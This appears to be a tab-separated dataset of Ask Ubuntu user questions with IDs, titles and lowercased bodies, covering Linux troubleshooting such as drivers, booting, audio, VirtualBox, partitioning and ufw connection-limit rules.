406335	how do i change the hold delay to move an unity launcher icon ?	i need to increase the hold delay to move an icon in the unity launcher in ubuntu 13.10 . how do i do that ? i need this because of latency of remote desktop access : a short click acts as a long one in the server/distant machine and so i ca n't launch/select an application from the dock . thanks for your help .
406336	coding in c language with code blocks editor	i can not display any object code after compiling.there are no plug ins for displaying object codes available . what might be the problem ? any code editors present for c other than code blocks ?
406341	skype : microphone only working for one ubuntu user	i 've had problems with skype for a bit , but managed to fix some of them ( using skype from the repos to make it work with pulseaudio , fixing cracking sounds as described in http : //itbubbles.wordpress.com/2013/10/21/xubuntu-13-10-sound-issues-skype-distorted-microphone-crackling-sound-indicator-disabled/ ) . now i have a rather odd problem : i have different ubuntu accounts for work and private , and skype works fine in my work account , but in my private user account , the microphone does n't work . ( i think i did the last skype reinstall on the work account ) . the microphone works well in other apps , but only silence in skype ( though i can hear the other side just fine ) . but the skype recording does seem to transmit system sounds ( skype notification sounds are recorded/transmitted ) . i tried with a clean skype profile ( dumping the ~/.skype dir ) , but no effect . i 'm on xubuntu 13.10 , skype 4.2.0.11 . any ideas ? what settings could be saved user-specifically ? access right issues ? user-specific audio settings ? thanks in advance , manuela
406343	ubuntu 13.10 x64 can not shut down properly , pressing esc stuck at purple screen	do n't think this is a replicated question . ubuntu 13.10 x64 can not shut down properly , pressing esc stuck at purple screen : broadcast message from root @ ubuntu-laptop ( unknown ) at 19:51 ... the system is going to power off now ! shutting down smartlink modem driver normally unloading modem driver from kernel ... none found . speech-dispatcher disabled : edit /etc/default/speech-dispatcher * asking all remaining processes to terminate ... [ ok ] * killing all remaining processes ... [ fail ] modem-manager [ 662 ] : < info > caught signal 15 , shutting down [ ok ] * deactivating swap ... mount : / is busy * will now halt and it hangs there and does n't shut down . please help and please tell me if more info needed !
406345	nvidia drivers for asus k73sv-ty238v	i have a 2 year old laptop ( an asus k73sv , 8gb ram , intel i7-2630qm , nvidia geforce gt540m 1gb ) and the gpu setup is a hybrid system ( which means it switches between the intel hd integrated in the cpu ) . i 'm running only ubuntu 13.10 atm and any proprietary driver installation of nvidia has failed . bumblebee , optimus , etc.. is there anybody out there who can tell me if it 's even possible to install proprietary drivers on my laptop ? ( or somebody with a similar setup who found a miraculous way to install and use them ? ) . i have been trying over a year to find something and this is my last resort ; ) . thank you for trying to help me ! edit : to clarify , before i installed the nvidia drivers without bumblebee , i just got stuck with a black screen at boot . i 'd had to mess around with the command line to get everything working again but it did work again . then i tried bumblebee , i thought it did n't work because nothing really changed ( optirun ) . now i have bumblebee installed but no idea how i should check if it works ...
406346	canonical apprenticeships ?	i am currently a student doing my 4th year at college passing 3 separate courses , my issue is that when i finish my course i will need to get a job or some sort of way to get income , i was thinking on going into freelance website design but that is a different story , i love ubuntu and i love the design and purpose of it , i was wondering if canonical does some sort of apprenticeships ? i am sure if i had that on my cv it would make my job hunting much more easier . experience is my only downfall right now considering i have the qualifications having something like that on my job application would lead to better and more fulfilling jobs ,
406349	confused about ubuntu / xubuntu releases	initially i had ubuntu installed , but later i switched to xubuntu by installing the xfce desktop , and removed the ubuntu-desktop , but now i`m confused about the release update because the updater says that there a new update : ubuntu 13.10 'saucy salamander ' and if i look in the sysinfo app it says that i have ubuntu 13.04 ( raring ) , gnome 3.6.3 , but i have xubuntu . if i do the update , then it will switch back to the ubuntu-desktop , or how can i make the xubuntu release update without installing the ubuntu-desktop ? thank you
406357	how to change a password	how do i change my password in ubuntu ? i think i have either 12.4 or 12.10 . i 'm a bit computer illiterate , so will need an answer for a computer dummy .
406360	rhythmbox wo n't play mp3 on windows partition	fresh ubuntu installation , rhythmbox works fine for mp3s located on my linux partition . but it refuses to open mp3 files on my windows partition . all other programs work fine with files on my other partition . any idea what i should do ?
406361	creative sound blaster recon3d fatal1ty driver ( ubuntu 13.10 )	i ca n't get my audio card working . in my output devices i have : +hdmi/displayport2 - gk104 hdmi audio controller [ working via minidisplayport on my tv ] +digital output ( s/pdif ) - sound blaster tactic ( 3d ) omega [ working via usb , wireless headset ] +analog output - sound blaster tactic ( 3d ) omega [ working via usb , wireless headset ] +digital output ( s/pdif ) - built-in audio +analog output - built-in audio [ working , gigabyte z77x-up7 , via analog stereo cable ] +digital output ( s/pdif ) - hda creative +analog output - hda creative [ not working at all ] so audio work flawless under windows , but not here : i had to temporary move my jack from my audio card , to mobo ; but ofc i would use my audio card . thanks
406364	play on linux `` can not set locale to `` `` error	can someone , please help me to fix this error . thank you !
406365	qemu-img : error while reading sector 327680 : invalid argument	i am trying to convert vmdk image to raw format but i am getting an error statement . qemu-img convert -f vmdk ubuntu-12.04-lts-jeos-1.0-disk1.vmdk -o raw myimage.raw and i am getting following error . qemu-img : error while reading sector 327680 : invalid argument however it creates myimage.raw image with 0 disk size . i have googled it but could n't find any solution . i am using qemu-img version 1.0 on ubuntu 12.04 64bit . any suggestions would be helpful
406367	`` '^^command not found '' terminal force quits	so i was trying to make an android from source when i guess i typed in some weird command that didnt work , next thing i know , i get the error `` ^^command not found '' and then my terminal force quits . now every time i try to open the terminal i get the same message and it force quits . i really need some help here and keep in mind that i cant actually use the terminal to fix this .
406376	i do n't have any os	i am having some issues with my hard disk on my laptop so i am changing it . hence , i will not have any os when i change the hard disk . ( i ca n't re-install windows , as i have the installation cd broken ) . i would like to know that can i install ubuntu as the first os in a laptop which does n't have any os on its own ?
406379	need to repair broken packages on each boot .	i am a new ubuntu user and i have recently installed it on my dv2000 hp laptop with a brand new 500gb hard drive . the first time i installed it , it was running smoothly with no problems but i did something and screwed it up so i reinstalled . now , every time i start up my computer it always starts on the menu that i would have to usually press esc to get into ( sorry i do n't know what it is called ) . in this menu i can go to recovery mode , earlier ubuntu versions etc . if i just press enter and wait for it to load up normally , i log in fine but then when it gets to the home screen , the only thing that loads up is the top menu bar and it is full of fuzzy lines . to fix this i have to go into recovery mode and repair broken packages every time i turn my computer on and i am just wondering if you could help it not do that every time i log on because it is so annoying
406382	update and vlc problem	hi all i 'm newbie in ubuntu i just tried to install vlc in terminal i write bader @ bader-compaq : ~ $ sudo apt-get install vlc [ sudo ] password for bader : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libcups2 : breaks : cups ( < 1.5.0 ) but 1.4.4-6ubuntu2 is to be installed libglib2.0-0 : breaks : gvfs ( < 1.8 ) but 1.6.4-0ubuntu1 is to be installed libgnome-keyring0 : breaks : gnome-keyring ( < 3.0 ) but 2.92.92.is.2.31.91-0ubuntu4 is to be installed libxfixes3 : breaks : unity ( < 5.6.0-0ubuntu2 ) but 0.2.46-0ubuntu4 is to be installed plymouth : breaks : gdm ( < 3.0.4-0ubuntu11 ) but 2.30.5-0ubuntu4 is to be installed e : broken packages and when i write bader @ bader-compaq : ~ $ sudo apt-get update hit http : //archive.canonical.com raring release.gpg ign http : //archive.canonical.com/ubuntu/ raring/partner translation-en hit http : //gb.archive.ubuntu.com raring release.gpg ign http : //us.archive.ubuntu.com maverick release.gpg ign http : //us.archive.ubuntu.com/ubuntu/ maverick/main translation-en hit http : //security.ubuntu.com raring-security release.gpg hit http : //security.ubuntu.com/ubuntu/ raring-security/main translation-en ign http : //archive.canonical.com/ubuntu/ raring/partner translation-en_us hit http : //gb.archive.ubuntu.com/ubuntu/ raring/main translation-en ign http : //gb.archive.ubuntu.com/ubuntu/ raring/main translation-en_us hit http : //archive.canonical.com raring release ign http : //security.ubuntu.com/ubuntu/ raring-security/main translation-en_us ign http : //us.archive.ubuntu.com/ubuntu/ maverick/main translation-en_us ign http : //us.archive.ubuntu.com/ubuntu/ maverick/multiverse translation-en hit http : //gb.archive.ubuntu.com/ubuntu/ raring/multiverse translation-en hit http : //security.ubuntu.com/ubuntu/ raring-security/multiverse translation-en hit http : //archive.canonical.com raring/partner sources ign http : //us.archive.ubuntu.com/ubuntu/ maverick/multiverse translation-en_us ign http : //us.archive.ubuntu.com/ubuntu/ maverick/restricted translation-en ign http : //gb.archive.ubuntu.com/ubuntu/ raring/multiverse translation-en_us hit http : //archive.canonical.com raring/partner i386 packages ign http : //us.archive.ubuntu.com/ubuntu/ maverick/restricted translation-en_us hit http : //gb.archive.ubuntu.com/ubuntu/ raring/restricted translation-en ign http : //us.archive.ubuntu.com/ubuntu/ maverick/universe translation-en ign http : //gb.archive.ubuntu.com/ubuntu/ raring/restricted translation-en_us ign http : //us.archive.ubuntu.com/ubuntu/ maverick/universe translation-en_us hit http : //gb.archive.ubuntu.com/ubuntu/ raring/universe translation-en ign http : //us.archive.ubuntu.com maverick release ign http : //security.ubuntu.com/ubuntu/ raring-security/multiverse translation-en_us ign http : //gb.archive.ubuntu.com/ubuntu/ raring/universe translation-en_us hit http : //gb.archive.ubuntu.com raring-updates release.gpg hit http : //security.ubuntu.com/ubuntu/ raring-security/restricted translation-en ign http : //us.archive.ubuntu.com maverick/universe i386 packages hit http : //gb.archive.ubuntu.com/ubuntu/ raring-updates/main translation-en ign http : //security.ubuntu.com/ubuntu/ raring-security/restricted translation-en_us ign http : //us.archive.ubuntu.com maverick/multiverse i386 packages ign http : //gb.archive.ubuntu.com/ubuntu/ raring-updates/main translation-en_us hit http : //security.ubuntu.com/ubuntu/ raring-security/universe translation-en hit http : //gb.archive.ubuntu.com/ubuntu/ raring-updates/multiverse translation-en ign http : //us.archive.ubuntu.com maverick/restricted i386 packages ign http : //security.ubuntu.com/ubuntu/ raring-security/universe translation-en_us ign http : //gb.archive.ubuntu.com/ubuntu/ raring-updates/multiverse translation-en_us ign http : //us.archive.ubuntu.com maverick/main i386 packages hit http : //security.ubuntu.com raring-security release hit http : //gb.archive.ubuntu.com/ubuntu/ raring-updates/restricted translation-en ign http : //gb.archive.ubuntu.com/ubuntu/ raring-updates/restricted translation-en_us ign http : //us.archive.ubuntu.com maverick/universe i386 packages hit http : //gb.archive.ubuntu.com/ubuntu/ raring-updates/universe translation-en hit http : //security.ubuntu.com raring-security/main sources ign http : //us.archive.ubuntu.com maverick/multiverse i386 packages ign http : //gb.archive.ubuntu.com/ubuntu/ raring-updates/universe translation-en_us hit http : //gb.archive.ubuntu.com raring-backports release.gpg hit http : //gb.archive.ubuntu.com/ubuntu/ raring-backports/main translation-en ign http : //us.archive.ubuntu.com maverick/restricted i386 packages ign http : //us.archive.ubuntu.com maverick/main i386 packages ign http : //gb.archive.ubuntu.com/ubuntu/ raring-backports/main translation-en_us hit http : //gb.archive.ubuntu.com/ubuntu/ raring-backports/multiverse translation-en hit http : //security.ubuntu.com raring-security/restricted sources hit http : //gb.archive.ubuntu.com/ubuntu/ raring-backports/multiverse translation-en hit http : //security.ubuntu.com raring-security/restricted sources cont err http : //us.archive.ubuntu.com maverick/universe i386 packages 404 not found ign http : //gb.archive.ubuntu.com/ubuntu/ raring-backports/multiverse translation-en_us hit http : //security.ubuntu.com raring-security/universe sources err http : //us.archive.ubuntu.com maverick/multiverse i386 packages 404 not found hit http : //gb.archive.ubuntu.com/ubuntu/ raring-backports/restricted translation-en hit http : //security.ubuntu.com raring-security/multiverse sources ign http : //gb.archive.ubuntu.com/ubuntu/ raring-backports/restricted translation-en_us err http : //us.archive.ubuntu.com maverick/restricted i386 packages 404 not found hit http : //gb.archive.ubuntu.com/ubuntu/ raring-backports/universe translation-en hit http : //security.ubuntu.com raring-security/main i386 packages err http : //us.archive.ubuntu.com maverick/main i386 packages 404 not found can anyone help me to solve this problem : ( ? this is my sources.list for the ones who asking ... # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //gb.archive.ubuntu.com/ubuntu/ raring main restricted deb-src http : //gb.archive.ubuntu.com/ubuntu/ raring main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //gb.archive.ubuntu.com/ubuntu/ raring-updates main restricted deb-src http : //gb.archive.ubuntu.com/ubuntu/ raring-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //gb.archive.ubuntu.com/ubuntu/ raring universe deb-src http : //gb.archive.ubuntu.com/ubuntu/ raring universe deb http : //gb.archive.ubuntu.com/ubuntu/ raring-updates universe deb-src http : //gb.archive.ubuntu.com/ubuntu/ raring-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //gb.archive.ubuntu.com/ubuntu/ raring multiverse deb-src http : //gb.archive.ubuntu.com/ubuntu/ raring multiverse deb http : //gb.archive.ubuntu.com/ubuntu/ raring-updates multiverse deb-src http : //gb.archive.ubuntu.com/ubuntu/ raring-updates multiverse # # uncomment the following two lines to add software from the 'backports' # # repository . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //gb.archive.ubuntu.com/ubuntu/ raring-backports main restricted universe multiverse deb-src http : //gb.archive.ubuntu.com/ubuntu/ raring-backports main restricted universe multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . this software is not part of ubuntu , but is # # offered by canonical and the respective vendors as a service to ubuntu # # users . deb http : //archive.canonical.com/ubuntu raring partner deb-src http : //archive.canonical.com/ubuntu raring partner deb http : //security.ubuntu.com/ubuntu raring-security main restricted deb-src http : //security.ubuntu.com/ubuntu raring-security main restricted deb http : //security.ubuntu.com/ubuntu raring-security universe deb-src http : //security.ubuntu.com/ubuntu raring-security universe deb http : //security.ubuntu.com/ubuntu raring-security multiverse deb-src http : //security.ubuntu.com/ubuntu raring-security multiverse deb http : //archive.ubuntu.com/ubuntu/ maverick universe multiverse restricted main deb http : //security.ubuntu.com/ubuntu/ maverick-security universe main multiverse restricted deb http : //archive.ubuntu.com/ubuntu/ maverick-updates universe main multiverse restricted deb http : //archive.ubuntu.com/ubuntu/ maverick-proposed universe main multiverse restricted
406385	cant get wifi working on my mid/late 2010 macbook	i installed a fresh ubutnu 13.10 on my mid/late 2010 macbook ( bought in november 2010 ) when i search the web , it says that you should just install additional drivers . well , i did that , and ubuntu shows wifi working , but it doesnt show any networks . also iwlist eth1 scanning doenst show any networks . i also tried installing b43-fwcutter and firmware-b43-installer manually , which worked on the same macbook with lubuntu ( which i wiped with normal ubuntu , because looooots of things didnt work ) . any suggestions ?
406390	ksnapshot mouse pointer is inactive	in ksnapshot mousepointer option is not active . i ran it as root but still it is inactive : how can i activate it ?
406392	how to install virtualbox ( ubuntu trusty tahr )	i 've trying to install virtual box from official ppa ( this guide https : //www.virtualbox.org/wiki/linux_downloads ) but then i trying to install sudo apt-get install virtualbox-4.3 reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : libsdl-ttf2.0-0 the following new packages will be installed : libsdl-ttf2.0-0 virtualbox-4.3 0 upgraded , 2 newly installed , 0 to remove and 148 not upgraded . need to get 0 b/68.6 mb of archives . after this operation , 154 mb of additional disk space will be used . do you want to continue ? [ y/n ] y preconfiguring packages ... selecting previously unselected package libsdl-ttf2.0-0 : amd64 . ( reading database ... 186449 files and directories currently installed . ) unpacking libsdl-ttf2.0-0 : amd64 ( from ... /libsdl-ttf2.0-0_2.0.11-3_amd64.deb ) ... selecting previously unselected package virtualbox-4.3 . unpacking virtualbox-4.3 ( from ... /virtualbox-4.3_4.3.6-91406~ubuntu~raring_amd64.deb ) ... processing triggers for ureadahead ... processing triggers for shared-mime-info ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for desktop-file-utils ... processing triggers for mime-support ... processing triggers for gnome-menus ... processing triggers for hicolor-icon-theme ... setting up libsdl-ttf2.0-0 : amd64 ( 2.0.11-3 ) ... setting up virtualbox-4.3 ( 4.3.6-91406~ubuntu~raring ) ... addgroup : the group `vboxusers ' already exists as a system group . exiting . stopping virtualbox kernel modules ... done . uninstalling old virtualbox dkms kernel modules ... done . trying to register the virtualbox kernel modules using dkmserror ! your kernel headers for kernel 3.8.0-34-generic can not be found . please install the linux-headers-3.8.0-34-generic package , or use the -- kernelsourcedir option to tell dkms where it 's located ... failed ! ( failed , trying without dkms ) recompiling virtualbox kernel modules ... failed ! ( look at /var/log/vbox-install.log to find out what went wrong ) processing triggers for libc-bin ... i can not install linux-headers-3.8.0-34-generic s apt-get install linux-headers-3.8.0-34-generic reading package lists ... done building dependency tree reading state information ... done package linux-headers-3.8.0-34-generic is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'linux-headers-3.8.0-34-generic ' has no installation candidate log cat /var/log/vbox-install.log uninstalling modules from dkms attempting to install using dkms creating symlink /var/lib/dkms/vboxhost/4.3.6/source - > /usr/src/vboxhost-4.3.6 dkms : add completed . failed to install using dkms , attempting to install without makefile:183 : *** error : unable to find the sources of your current linux kernel . specify kern_dir= < directory > and run make again . stop . can anyone help me ? ps sorry for my writing mistakes . english in not my native language .
406394	how to install ubuntu phone os on my samsung galaxy s3 ?	is there an guide or way to install the ubuntu phone os on other devices and is it safe ? i saw this but they are saying that is not stable yet . i 'm asking about `` ubuntu phone os '' and i need an installation guide as well or preferably a step by step installation guide . if any thing happens will i be able to but android on my phone again ? thank you .
406396	the different between install mpich2 from ubuntu repository and from mpich source package	i am trying to build parallel computation system with master machine and helper machine . based on the literature review i get : install mpich2 from sudo apt-get install mpich2 make a shared folder and install mpich-3.0.4 in this folder so that the helper machine can access it is there any different within this two approach ? what will happen if i do both ? would it be any conflict between mpich2 and mpich 3.0.4 if i install both ? which one is more efficient ? thanks in advance
406397	ubuntu openstack image for esxi server	what i already have : - > vmware esxi server installation configured and running what i am trying to accomplish : - > install ubuntu 12.x open stack images under esxi bear metal as vms and bring up open stack open stack compute , glance and swift under different vms . what i am looking for : path for ubuntu + open stack 64 bit bundled images and some instructions . any help ? -- amru
406411	dvdrip - can not extract	i am unable to extract dvds in dvd : :rip . when i try , the job progress dialog just says there is an error . i found a log file , but i do n't see any indication of what the error is in it . i checked the debug - > check dependencies and that is fine . i can not post images due to reputation . thu jan 16 15:28:40 2014 project hhhhhh created thu jan 16 15:28:43 2014 start job 'read toc ( lsdvd|tcprobe ) ' thu jan 16 15:28:43 2014 start job 'read toc ( lsdvd ) ' thu jan 16 15:28:43 2014 executing command : execflow lsdvd -a -n -c -s -v -op \/dev\/dvd 2 > /dev/null & & echo execflow_ok thu jan 16 15:28:43 2014 not enabling psu core , because this movie has only one psu . thu jan 16 15:28:43 2014 start job 'read toc ( tcprobe ) ' thu jan 16 15:28:43 2014 successfully read dvd toc thu jan 16 15:28:43 2014 copying ifo files from /media/miles_davis to /home/hal/dvdrip-data/hhhhhh/tmp/ifo thu jan 16 15:28:43 2014 job 'read toc ( lsdvd|tcprobe ) ' finished thu jan 16 15:28:44 2014 job 'read toc ( tcprobe ) ' finished thu jan 16 15:28:44 2014 job 'read toc ( lsdvd ) ' finished thu jan 16 15:28:48 2014 start job 'rip selected title ( s ) / chapter ( s ) ' thu jan 16 15:28:48 2014 start job 'process title # 1' thu jan 16 15:28:48 2014 start job 'rip - title # 1' thu jan 16 15:28:48 2014 executing command : rm -f /home/hal/dvdrip-data/hhhhhh/vob/001//hhhhhh- ? ? ? .vob & & execflow -n 19 tccat -t dvd -t 1 , -1,1 -i \/dev\/dvd | dvdrip-splitpipe -f /home/hal/dvdrip-data/hhhhhh/tmp/hhhhhh-001-nav.log 1024 /home/hal/dvdrip-data/hhhhhh/vob/001//hhhhhh vob | tcextract -a 0 -x pcm -t vob | tcscan -x pcm & & echo execflow_ok thu jan 16 15:28:52 2014 executing command : execflow tcprobe -i /home/hal/dvdrip-data/hhhhhh/vob/001/ & & echo execflow_ok thu jan 16 15:28:52 2014 job 'rip - title # 1 ' finished any thoughts ? thanks .
406414	unable to install ( nokia pc suite ) nokuntu on 13.10 & 14.04	trying to install nokuntu on ubuntu 13.10 but showing the below error . installed gambas3 but not solving the issue .
406417	problem changing settings in desktop and programs in ubuntu 12.04 lts	i had ubuntu gnome 13.10. installed , but it was n't very stable , so i installed ubuntu lts 12.04 in its place , removing everything from / , but keeping /home . now i have several , but possibly related problems . a list of things i have noticed thus far : i can not change the background picture . it simply wo n't change regardless of what is chosen from the menu . changes to unity sidebar do not persist between logins . the default icons return at every login . changes to deja dup do not happen - if i open the settings panel and close it again , the changes are gone . backup can be started , but does nothing . i tried removing settings from the desktop , but returning everything to default settings did just that , without removing the problem . however , i have no problems installing new software or changing compiz settings or having those persist .
406420	problems booting with virtualization enabled in bios	my machine is a lenovo w530 thinkpad with an intel i7-3740qm running xubuntu 13.10 . this setup has been fairly stable since october but recently i started testing xubuntu 14.04 in virtualbox . to get this to work i had to enable virtualization in bios . the next few days i had trouble booting but it would typically work if i just held down the power button and tried again . today i had trouble booting again , however , i retried about 5 times with no success . i then decided to turn off virtualization in bios to see if that would help and now it boots normally again . would methods can i use to troubleshoot this problem ? if this is a bug what information should i provide in a bug report .
406425	non programmable method to edit indicators	how could i edit or change some behaviors or appearance in indicators ? ! i know that there is questions about before but the questions is about creating new one so its not duplicate : ) i need to learn if an edit can be done easily
406427	editing with nano	is it possible to edit an existing text file using only one line of command and nano . for instance if i have a text file called `` new.txt '' and i want to write `` hello world '' in it . can i do like this : nano new.txt `` something that will make it to write in that file `` hello world '' that is , can i write in a file using nano without explicitly opening it in nano . yet only add something after the command nano ( like -w for write ) and the file name in the terminal .
406431	clamav signature out-of-date	just installed clamav and the clamtk frontend . however the programs says that virus definitions are out of date . i ran the freshclam command but the clamtk still says `` the signatures are out-of- date . '' are clamav still updating the signatures ? if not what av program would be best to use ? running : ubuntu 13.10 dell inspiron e1505 laptop
406435	upgrading intel gpu drivers . ppa or from source ?	i 'm experiencing a bug with my i915 drivers for my intel hd 4400 card ( namely on leaving the laptop inactive for sometime , with screensaver running , i come back to find only a black screen with a moveable mouse cursor ) . hence , i 'm considering updating the driver from the repo version to something newer . first question , do i need to purge/remove the old drivers first ? should i go with the ppa : ubuntu-x-swat/x-updates ppa as described here , or should i manually make by downloading from 01.org ? any difference ? ( note i am on ubuntu 12.04.4 so intels graphical installer method is a no go i believe ) . i do n't really want to be `` bleeding edge '' , i prefer stability with no bugs , it 's just the freezing bug making me want to upgrade , so maybe the one time upgrade by make ing the intel source is best ?
406437	bluetooth network access turns off immediately after turning it on	my computer ( ubuntu 13.10 ) is connected to the internet via bluetooth via my phone ( nexus 4 ) . this worked perfectly fine , however now it stopped working . in the network settings bluetooth is turned off . if i try to turn it on it says `` connecting '' and turns back off . any ideas and any further information needed ?
406438	how to increase space for installing programs	noobie on 12.04 . sorry if this has been answered before but i have not been able to locate it . i had ubuntu and windows installed together and then got rid of windows . however , when i install programs they go into dev/sda1 and it is running out of room , while my newly created ext4 partition dev/sda2 is where all the memory sits ( yes , i know , `` all the memory '' -- it is an old laptop ) . if i want to be able to install more programs , do i need to run gparted and resize partitions ? or is this an issue of `` ownership '' or using grub ? or something else ? here is what i look like : disk /dev/sda : 60.0 gb , 60022480896 bytes 255 heads , 63 sectors/track , 7297 cylinders , total 117231408 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xbf2ebf2e device boot start end blocks id system /dev/sda1 * 63 101936392 50968165 7 hpfs/ntfs/exfat /dev/sda2 101937150 117229567 7646209 5 extended /dev/sda5 116203520 117229567 513024 82 linux swap / solaris /dev/sda6 101937152 116203519 7133184 83 linux i want more space from /dev/sda1 to /dev/sda6 which was my root partition .
406439	ubuntu replacing windows 8	i had 3 partition ( c ( 150gb ) , d ( 350gb ) , e ( 400gb ) ) and windows 8.1 installed on c drive . i replaced windows 8 with ubuntu 13.04 . now i have only one file system ( 900gb ) . is there any way to access data of d and e partition from ubuntu ? is it possible to get back d , e partition if i replace ubuntu with windows ? has ubuntu formatted my entire hard disk ? $ df -h /dev/sda2 909g 2.7g 861g 1 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup udev 3.9g 4.0k 3.9g 1 % /dev tmpfs 788m 860k 787m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 3.9g 156k 3.9g 1 % /run/shm none 100m 44k 100m 1 % /run/user /dev/sda1 93m 121k 93m 1 % /boot/efi
406441	mess of issues creating live usb from windows	i 've been trying to create a live linux usb and have encountered a variety of the most vexing problems . short story : i ca n't get the usb to boot , but the symptoms are different with every attempt . the only thing in common is that i have n't succeeded yet . background : i have 2 usb sticks , each of which has previously successfully been used to create a live linux usb . i was playing around with distros , and created them using a variety of tools , including lili , yumi , liveusb creator , universal-usb-installer and the ubcd instructions on command line . i may have also once succeeded creating one completely from command line instructions . both of these usb sticks never had any problems , neither did my bios , up until ... background ii : i decided to try making a hackintosh on my 5yr old computer . the specs were just a little out of date , but i found people who had similar builds , so i thought i would give it a go . it was a complete failure , with all sorts of problems , and i 'm resigned to failure there . the crux of this point is that i used both of these usb sticks in the attempt , which meant putting them in my macbook to make them bootable on my pc . current : after i gave up the hackintosh project , i decided to go ahead with my linux installation , but now i ca n't get my usb sticks to boot . i have tried creating install usbs using windows , mac osx and linux ( on an old partition ) . my typical results are : usb made from windows - bios does n't recognize the usb hdd and therefore i ca n't boot from it . usb made from mac/linux - bios recognizes the usb hdd and boots , but then says `` missing operating system '' . i think i have gotten several other results , too , like a boot : prompt with no grub ui ( i think the usb boot failed and it tried to move on to another disk at that point ) , but frankly i 've done this so many times with so many different tools , command line instructions , etc. , that it 's all blurring together . other that a solicitation for general advice , one question i have is whether it is possible to `` ruin '' a usb stick by making it bootable using a mac , and then trying to do so from windows . i have done slow formats , quick formats , installed the boot files by hand , used the tools , etc . and this whole thing is becoming very discouraging . thanks for your help , if you can provide any . p.s . i can provide specs for my computer if they 're relevant . p.p.s . i have a 3rd usb stick with my windows 7 installer on it that still works just fine . it was never included in the hackintosh project , so it was never made bootable on a mac . p.p.p.s . all of these are `` made on '' not `` made for '' - meaning they were all for booting a pc , whether i used a mac , windows or linux to create the install usb . p.p.p.p.s . the usb sticks are all always fat32 formatted . update i have more information , but it 's still bleak : 1 ) i tested my usb sticks on a different computer and they work fine . 2 ) i fixed all my mbr issues on my computer and confirmed that i can boot into the installed oses without problems , but the usb sticks now all give me , without variation , the error : `` no default or ui configuration directive found '' and they are not detected by my bios . these very same sticks work in my laptop , but not my computer . and i can still create windows 7 installer usb sticks which do work in my computer - only the linux usb sticks are not working , and only in this computer . this defiance of reason is really driving me nuts .
406444	how do i whitelist some connections by ip from being dropped by connlimit ?	i 'm using these rules in /etc/ufw/before.rules # limit to 20 concurrent connections on port 80 per ip -a ufw-before-input -p tcp -- syn -- dport 80 -m connlimit -- connlimit-above 20 -j drop -a ufw-before-input -p tcp -- syn -- dport 443 -m connlimit -- connlimit-above 20 -j drop # limit to 20 connections on port 80 per 2 seconds per ip -a ufw-before-input -p tcp -- dport 80 -i eth0 -m state -- state new -m recent -- set -a ufw-before-input -p tcp -- dport 80 -i eth0 -m state -- state new -m recent -- update -- seconds 2 -- hitcount 20 -j drop -a ufw-before-input -p tcp -- dport 443 -i eth0 -m state -- state new -m recent -- set -a ufw-before-input -p tcp -- dport 443 -i eth0 -m state -- state new -m recent -- update -- seconds 2 -- hitcount 20 -j drop i want to add a rule that will force the local system ips to not be connection or rate limited at all . for example , i have many cron jobs that connect to the server within the server . i need to prevent these from failing when too many are running at once . update with solution : i think i just had to add more rules in before.rules instead of ufw command line to override the connection limit for specific ips . i ca n't answer my own question yet . i just adds these rules above the connlimit rules : -a ufw-before-input -p tcp -- dport 80 -s 127.0.0.1 -j accept -a ufw-before-input -p tcp -- dport 443 -s 127.0.0.1 -j accept
406447	restore ubuntu 12.10 after an installation	after a recent installation of pgadminiii and geany with ubuntu software center , i remarked changes on my operating system , specially with my desktop 's configurations . is there any way to restore the previous configurations ? is there any way to restore like on windows ? i 'm using pinguy os ( based on ubuntu 12.10 )
406449	unity options missing after gnome3 installation and removal	i am running ubuntu 13.10 and wanted to try gnome3 as a replacement for unity . i downloaded it , installed it , it worked fine . i did n't like it though so i decided to go back to unity and uninstalled the same packages i installed when getting gnome3 . now some of the options in the settings are missing : for example appearance is no longer available in the settings pane and i 'm under the impression that there were more buttons than just `` language support '' , `` region & language '' and `` ubuntu one '' . additionally i do n't have a screen background anymore , it is just black . did i remove to many packages ?
406451	boot from an existing vhd with ubuntu installation	i 'm currently using window 8 as host os and using ubuntu from a virtual box vhd . so my ubuntu is running as virtual machine just fine with a few programs and developing tools . but i now need to run in the ubuntu environment some processes which require heavy processing and memory , so i would love to run them not in a virtual machine but in the host linux os with the full resources available . is it possible to configure the machine to boot from that vhd i 'm already using ? i have seen several posts on how to install a new ubuntu with dual boot , configure dual boot inside a virtual machine , etc . i'v seen some msdn post about booting from vhd , but that works only for windows os and it requires windows enterprise edition . i could n't find anything for booting ubuntu straight from a vhd . is it possible ? how ? thanks !
